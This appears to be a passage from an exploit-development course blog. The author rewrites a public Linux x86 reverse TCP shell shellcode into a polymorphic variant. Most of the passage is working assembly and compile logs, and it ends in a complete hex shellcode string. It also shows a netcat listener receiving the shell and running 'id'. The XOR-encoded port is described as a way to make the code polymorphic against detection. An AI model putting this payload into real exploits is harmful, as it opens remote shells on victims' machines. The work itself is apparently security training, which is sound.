Having saved the file to an ASM file, I’ve commented the original code for every argument. Compilation will be an issue at the moment, due to referring to static memory addresses: that’s not going to work, so we’ll have to work around this.
Another problem is an incomplete value for pushing the port number.
Compiling first attempt:
$ ../compile_asm.sh asm_linx86_revtcp_bind_shellstorm_sample1-alt
[+] Assembling with Nasm ...
asm_linx86_revtcp_bind_shellstorm_sample1-alt.asm:34: error: parser: instruction expected
[+] Linking ...
ld: cannot find asm_linx86_revtcp_bind_shellstorm_sample1-alt.o: No such file or directory
[+] Done!Whoops! Not going to work, let’s check what’s on line 18.
$ sed -n '34,34p' asm_linx86_revtcp_bind_shellstorm_sample1-alt.asm
pushw 0x697a ; Port 31337Seems like pushing the port does gets us into trouble. Also, the dup2 also cause some trouble using static addresses:
; sys_dup2 0x3f
; int dup2(int oldfd, int newfd);
; dup2(client, 0); // STDIN
; dup2(client, 1); // STDOUT
; dup2(client, 2); // STDERR
xor ecx,ecx ; Clear registry
mov cl,0x3 ; Put 0x3 in CL for loop
dec cl ; Dec for the loop
mov al,0x3f ; dup2
int 0x80 ; syscall
jne 0x804a07a ; Jump to "dec cl" for loopFixing lines:
First, copy the file to another file for modifications (yes, again):
$ cp asm_linx86_revtcp_bind_shellstorm_sample1-alt.asm asm_linx86_revtcp_bind_shellstorm_sample1-alt-opt.asmIP and port fix:
Using 127.1.1.1 as localhost and using the same port. However, using a XOR for the port otherwise it won’t compile. Also, this helps a little in creating polymorphic code.
; push 0xa01a8c0 ; IP 192.168.1.10
push 0x0101017f ; IP 127.1.1.1
; pushw 0x697a ; Port 31337
push word 0x9685 ; Value to be XOR'ed
pop di ; Put into DI of EDI
xor di, 0xffff ; XOR the value
push di ; Put back on stack as argumentDup2 loop-fix:
Using the same construction as from our previously made reverse TCP shellcode. This time, using ESI as an FD.
; sys_dup2 0x3f
; int dup2(int oldfd, int newfd);
; dup2(client, 0); // STDIN
; dup2(client, 1); // STDOUT
; dup2(client, 2); // STDERR
; xor ecx,ecx ; Clear registry
; mov cl,0x3 ; Put 0x3 in CL for loop
; dec cl ; Dec for the loop
; mov al,0x3f ; dup2
; int 0x80 ; syscall
; jne 0x804a07a ; Jump to "dec cl" for loop
; Prepare loop
push 2
pop ecx ; For counting
xchg ebx, esi ; Exchange EBX for ESI, ESI for EBX; ESI containing socket FD for dup2, now in EBX
loop:
mov al, 63
int 0x80
dec ecx
jns loopCompile and run:
$ ../compile_asm.sh asm_linx86_revtcp_bind_shellstorm_sample1-alt-opt
[+] Assembling with Nasm ...
[+] Linking ...
[+] Done!
Prepare shell and run binary
$ nc -lvnp 31337
Listening on [0.0.0.0] (family 0, port 31337)
$ ./asm_linx86_revtcp_bind_shellstorm_sample1-alt-opt
$ nc -lvnp 31337
Listening on [0.0.0.0] (family 0, port 31337)
Connection from [127.0.0.1] port 31337 [tcp/*] accepted (family 2, sport 53472)
id
uid=1000 gid=1000(vbox) groups=4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare),1000(vbox)
Converting and compiling as C
While the ASM variant works, let’s check our generic C template script to include the shellcode and check the size.
Having a shellcode size of 92 it’s equally sized to the original.
$ ../convert_bin_sc.sh asm_linx86_revtcp_bind_shellstorm_sample1-alt-opt_jmpcallpop-more_opt
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\x43\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x01\x01\x01\x66\x68\x7a\x69\x66\x53\x43\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x6a\x02\x59\x87\xde\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x52\xeb\x0b\x5b\x52\x89\xe1\x52\x89\xe2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"
$ ./asm_linx86_revtcp_bind_shellstorm_sample1-alt-opt_jmpcallpop-more_opt_c
Shellcode Length: 89